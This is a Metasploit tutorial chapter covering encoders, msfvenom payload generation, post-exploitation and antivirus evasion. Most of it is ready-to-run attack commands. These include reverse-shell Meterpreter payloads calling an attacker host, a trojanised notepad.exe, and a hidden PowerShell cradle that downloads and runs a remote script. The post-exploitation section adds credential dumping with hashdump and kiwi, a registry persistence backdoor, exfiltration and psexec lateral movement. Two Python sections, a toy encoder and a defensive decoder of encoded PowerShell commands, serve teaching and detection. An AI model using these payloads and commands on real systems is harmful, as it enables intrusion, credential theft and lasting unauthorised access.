Encoders & Msfvenom: Advanced Exploitation Techniques

Overview

Advanced exploitation techniques enhance the effectiveness of penetration tests by improving stealth, overcoming security defenses, and customizing payloads. This chapter covers the use of encoders, the msfvenom tool, and post-exploitation workflows to maximize the utility of Metasploit.

Encoders in Metasploit

Purpose of Encoders:

  • Remove bytes the delivery path cannot carry (e.g., null bytes in a string copy, \x0a or \x0d in a line-oriented protocol). The payload is transformed and a small decoder stub is prepended that restores it in memory at run time.

  • Historically, also to slip past antivirus (AV) and intrusion detection systems (IDS). That use has largely stopped working: every Metasploit decoder stub has been signatured for years, so treat encoders as a bad-character tool first and an evasion tool a distant second.

Popular Encoders:

  1. Shikata Ga Nai (x86/shikata_ga_nai):

    • Polymorphic XOR additive-feedback encoder for x86, and the highest-ranked x86 encoder shipped with Metasploit. The decoder stub is regenerated with different register choices and a random key each run, so two encodings of the same payload differ byte for byte.

    • The name translates to "it cannot be helped" in Japanese. It is a joke, not a measure of reliability: the stub itself is a well-known signature and current AV engines flag it no matter how many iterations are used.

    • Selected with -e x86/shikata_ga_nai; -i sets the number of passes (see the full command under Encoding a Payload below).

  2. Other Encoders:

    • x64/xor_dynamic: XOR encoder with a dynamically generated key for 64-bit payloads.

    • cmd/powershell_base64: wraps a command payload in the UTF-16LE Base64 form that powershell.exe -EncodedCommand accepts.

    • The complete, ranked list for the installed version is printed by msfvenom --list encoders. When -b is given without -e, msfvenom tries compatible encoders in rank order and keeps the first whose output contains none of the listed bytes.

Encoding a Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe

Each pass wraps the previous output (stub plus encoded body) in a new stub, so the blob grows by a few dozen bytes per iteration. With -f exe the result is then placed in a stock PE template, and it is that template, not the encoded shellcode, that most AV products match on.

Using msfvenom

What is msfvenom?

  • A tool for generating and encoding custom payloads.

  • Replaced the older msfpayload and msfencode utilities.

Key Features:

  • Generates shellcode, standalone executables, and scripts.

  • Encodes payloads to evade detection.

  • Customizable formats for different platforms.

Basic Syntax:

msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> > <output_file>

Common Options:

  Option   Description
  -p       Payload to generate (e.g., windows/meterpreter/reverse_tcp).
  LHOST    Attacker's IP address (payload option, passed as KEY=value).
  LPORT    Port the attacker listens on (payload option).
  -f       Output format (e.g., exe, aspx, elf, raw, c, python).
  -e       Encoder to use (e.g., x86/shikata_ga_nai).
  -i       Number of encoding iterations.
  -b       Bytes the output must not contain (e.g., "\x00\x0a\x0d"); selects an encoder automatically if -e is not given.
  -x       Existing executable to use as the template for the payload.
  -k       With -x: keep the template's original behaviour and run the payload in a new thread.
  -a       Target architecture (x86, x64); with --platform, needed only when it cannot be inferred from the payload.

Examples of msfvenom Usage

Every reverse payload below needs a listener on the attacker side before it runs: in msfconsole, exploit/multi/handler configured with the same payload, LHOST and LPORT, or the session never arrives.

  1. Generate a Reverse Shell for Windows:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > reverse_shell.exe
  2. Create an ASP.NET Payload Page (this is not an exploit in itself; it is dropped on an IIS host where an upload or write path already exists, and runs the payload when the page is requested):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f aspx > exploit.aspx
  3. Encode a Payload with Shikata Ga Nai:

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f elf > payload.elf
  4. Payload with Bad Character Exclusion (no -e given, so msfvenom picks the highest-ranked encoder that avoids the listed bytes and reports which one it used; -b matters when the shellcode travels through a path that mangles bytes, typically -f raw, c or python, and changes nothing about delivery inside an exe wrapper):

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1337 -b "\x00\x0a\x0d" -f exe > clean_payload.exe
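What an encoder actually does to the bytes, and why a bad-character set constrains the choice of key, is easier to see in code than in a flag listing. The following is an added example written for this page, not Metasploit source: a toy XOR additive-feedback encoder modelled on the idea behind x86/shikata_ga_nai, with the random key search that -b forces and the layer-on-layer wrapping that -i produces. It leaves out everything the real encoder does to emit an executable, polymorphic x86 decoder stub (here the "stub" is just the four key bytes in front of the body), and the sample payload bytes are constructed for the example.

```python
"""Toy XOR additive-feedback encoder with bad-character-aware key search.

Added example for this page, modelled on the idea behind x86/shikata_ga_nai.
It is NOT Metasploit's encoder: the real one emits a polymorphic x86 decoder
stub; here the "stub" is only the 4-byte key written in front of the body.
"""
import os
import struct

BLOCK = 4
PAD = b"\x90"  # assumption: pad to a 4-byte boundary with NOPs, as msfvenom does


def _dwords(data: bytes) -> list:
    """Split into little-endian 32-bit words, padding the tail if needed."""
    rem = len(data) % BLOCK
    if rem:
        data += PAD * (BLOCK - rem)
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), BLOCK)]


def xor_additive_encode(payload: bytes, key: int) -> bytes:
    """c_i = p_i XOR k_i; k_{i+1} = (k_i + p_i) mod 2^32.

    The key feeds back from the decoded word, so one fixed key still yields
    a different XOR mask for every word of the payload.
    """
    out = bytearray()
    k = key & 0xFFFFFFFF
    for p in _dwords(payload):
        out += struct.pack("<I", p ^ k)
        k = (k + p) & 0xFFFFFFFF
    return bytes(out)


def xor_additive_decode(encoded: bytes, key: int) -> bytes:
    """Mirror of the encoder; this is the work the decoder stub does in memory."""
    out = bytearray()
    k = key & 0xFFFFFFFF
    for c in _dwords(encoded):
        p = c ^ k
        out += struct.pack("<I", p)
        k = (k + p) & 0xFFFFFFFF
    return bytes(out)


def has_bad_chars(data: bytes, bad: bytes) -> bool:
    return any(b in bad for b in data)


def find_key(payload: bytes, bad: bytes, tries: int = 100_000) -> int:
    """Random search for a key whose encoded output contains no forbidden byte.

    The key bytes ship inside the stub (mov eax, key in the real encoder),
    so they are checked against the bad-char set as well as the body.
    """
    for _ in range(tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        if has_bad_chars(struct.pack("<I", key), bad):
            continue
        if not has_bad_chars(xor_additive_encode(payload, key), bad):
            return key
    raise ValueError("no suitable key found; payload or bad-char set too constrained")


def encode_layers(payload: bytes, bad: bytes, iterations: int) -> bytes:
    """Model of -i N: each pass wraps the previous stub+body in a new layer.

    Output grows by one header per pass, and the outermost layer always has
    the same shape, which is why extra iterations buy little against a
    signature written for the stub itself.
    """
    blob = payload
    for _ in range(iterations):
        key = find_key(blob, bad)
        blob = struct.pack("<I", key) + xor_additive_encode(blob, key)
    return blob


def decode_layers(blob: bytes, iterations: int) -> bytes:
    """Peel the layers back off, outermost first."""
    for _ in range(iterations):
        key = struct.unpack_from("<I", blob)[0]
        blob = xor_additive_decode(blob[BLOCK:], key)
    return blob


# Constructed sample: 28 bytes that deliberately contain the three bytes
# excluded by -b "\x00\x0a\x0d" on this page.
SAMPLE = (b"\xb8\x0d\x0a\x00\x00"
          b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
          b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
BAD = b"\x00\x0a\x0d"


def demo(iterations: int = 3) -> dict:
    blob = encode_layers(SAMPLE, BAD, iterations)
    return {
        "input_has_bad": has_bad_chars(SAMPLE, BAD),
        "output_has_bad": has_bad_chars(blob, BAD),
        "size": len(blob),
        "roundtrip": decode_layers(blob, iterations) == SAMPLE,
    }


if __name__ == "__main__":
    print(demo())
```

Run it and the input reports bad bytes present, the three-layer output reports none, and the size is the input plus one 4-byte header per layer. The key search is probabilistic: for a long payload and a large bad-character set it can fail, which is exactly the "no encoder succeeded" situation msfvenom reports for over-constrained -b lists.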

Post-Exploitation Techniques

Once an exploit succeeds, post-exploitation focuses on maintaining access, gathering information, and preparing for further attacks.

  1. Privilege Escalation:

    • Use local_exploit_suggester to identify potential privilege escalation exploits.

      use post/multi/recon/local_exploit_suggester
      set SESSION <session_id>
      run
  2. Gathering Credentials:

    • Dump the local SAM hashes (requires a SYSTEM session; escalate first or the command fails):

      meterpreter > hashdump
    • Load the kiwi extension (the in-process Mimikatz port that replaced the older "mimikatz" extension) for LSASS credential harvesting. Use a SYSTEM session whose architecture matches the OS, or LSASS cannot be read:

      meterpreter > load kiwi
      meterpreter > creds_all
      meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
  3. Persistence:

    • Install a registry Run-key backdoor. The module writes a VBS launcher to disk and a startup registry entry and prints the path of a cleanup resource script; remove the artifacts at the end of the engagement, and have a handler listening on LPORT to catch the callback at next logon:

      use exploit/windows/local/persistence
      set SESSION <session_id>
      set LPORT 4445
      run
  4. Data Exfiltration:

    • Download files from the target system:

      meterpreter > download <target_file> <local_path>
  5. Lateral Movement:

    • Pivot through the compromised host by adding a route for its internal subnets (post/multi/manage/autoroute against the session), then run scanners and exploits against hosts the attacker cannot reach directly. smb_login sprays harvested credentials across the subnet; a valid hit can then be used with exploit/windows/smb/psexec to obtain a session on the new host:

      use auxiliary/scanner/smb/smb_login

Bypassing AV and IDS

Techniques for Evasion:

  1. Encoding with msfvenom:

    • Multiple iterations re-wrap the output, but the outermost decoder stub is still a known stub, so the gain against signature-based AV is marginal and the payload grows with every pass:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -e x86/shikata_ga_nai -i 10 -f exe > stealth_payload.exe
  2. Template Injection:

    • Embed the payload in a legitimate executable. -x supplies the template and -k keeps its original behaviour, running the payload in a new thread; without -k the template's entry point is overwritten and the program no longer does its original job. The template's architecture must match the payload's (an x86 payload in a 64-bit notepad.exe fails):

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -x notepad.exe -k -f exe > infected_notepad.exe
  3. Memory-Only Execution:

    • Avoid writing the payload to disk at all: staged Meterpreter already loads its DLL reflectively in memory, and the download cradle in the next item fetches a script over HTTP and runs it without a file touching disk. This defeats on-access file scanning only; memory scanning, AMSI and PowerShell script block logging (Event ID 4104, which records the script content) still see it.
  4. Obfuscation:

    • Use PowerShell or scripting techniques to hide payload execution. The download cradle below is the classic form and is itself heavily signatured: the -w hidden, IEX and DownloadString combination is a standard detection rule, so expect it to be logged and blocked on a monitored host:

      powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker_IP>/payload.ps1')"
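Both cmd/powershell_base64 (listed under Other Encoders above) and the -EncodedCommand variant of the cradle rely on one transform: the command as UTF-16LE, then Base64. The following added example, not Metasploit's source, implements that transform in both directions and a small scanner that pulls such arguments out of process command lines, as a process-creation log would carry them, and decodes them back to the script that ran. The command lines are constructed for the example; -nop, -w hidden and -e are real PowerShell switches.

```python
"""UTF-16LE + Base64 wrapping for PowerShell -EncodedCommand, both directions.

Added example for this page, not Metasploit's cmd/powershell_base64 source.
Encoder side: what that module (and an attacker building a one-liner) does to
a command. Decoder side: what a defender does to a logged command line to
recover the script that actually ran.
"""
import base64
import re


def ps_encode(command: str) -> str:
    """Produce the argument that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def ps_decode(blob: str) -> str:
    """Inverse of ps_encode; raises on malformed input."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def build_encoded_cmdline(command: str) -> str:
    """The cradle from this page in its encoded form (switches are real PowerShell options)."""
    return f"powershell -nop -w hidden -e {ps_encode(command)}"


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the switch loosely and let decoding decide whether the argument really is one.
_ENC_ARG = re.compile(r"(?i)(?<![\w-])-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")


def extract_encoded_commands(cmdline: str) -> list:
    """Return every argument in cmdline that decodes to printable UTF-16LE text."""
    found = []
    for m in _ENC_ARG.finditer(cmdline):
        arg = m.group(1)
        if len(arg) % 4:
            continue
        try:
            text = ps_decode(arg)
        except (ValueError, UnicodeDecodeError):
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            found.append(text)
    return found


def scan(cmdlines) -> list:
    """(line index, decoded command) for every encoded command found."""
    hits = []
    for i, line in enumerate(cmdlines):
        for text in extract_encoded_commands(line):
            hits.append((i, text))
    return hits


CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.ps1')"

# Constructed command lines, as a Windows 4688 or Sysmon Event ID 1 record would carry them.
SAMPLE_CMDLINES = [
    build_encoded_cmdline(CRADLE),
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand dwBoAG8AYQBtAGkA",  # encodes: whoami
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",      # benign, no hit
]


if __name__ == "__main__":
    for idx, text in scan(SAMPLE_CMDLINES):
        print(f"line {idx}: {text}")
```

The scanner deliberately matches the switch loosely and validates by decoding, because "-enc", "-ec" and "-e" are all accepted by powershell.exe and a rule that only looks for the full "-EncodedCommand" misses most real command lines. The benign -File invocation produces no hit, and the encoded cradle decodes to exactly the plaintext one-liner on this page.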

Command Cheatsheet

  Command                                         Description
  msfvenom                                        Generate and encode payloads.
  use post/multi/recon/local_exploit_suggester    Suggest privilege escalation exploits for a session.
  meterpreter > hashdump                          Extract local SAM password hashes (needs SYSTEM).
  meterpreter > load kiwi                         Load the kiwi (Mimikatz) extension for credential harvesting; older versions used load mimikatz.
  meterpreter > download <file>                   Download a file from the target system.
  msfconsole -q                                   Launch Metasploit without the startup banner (quiet mode).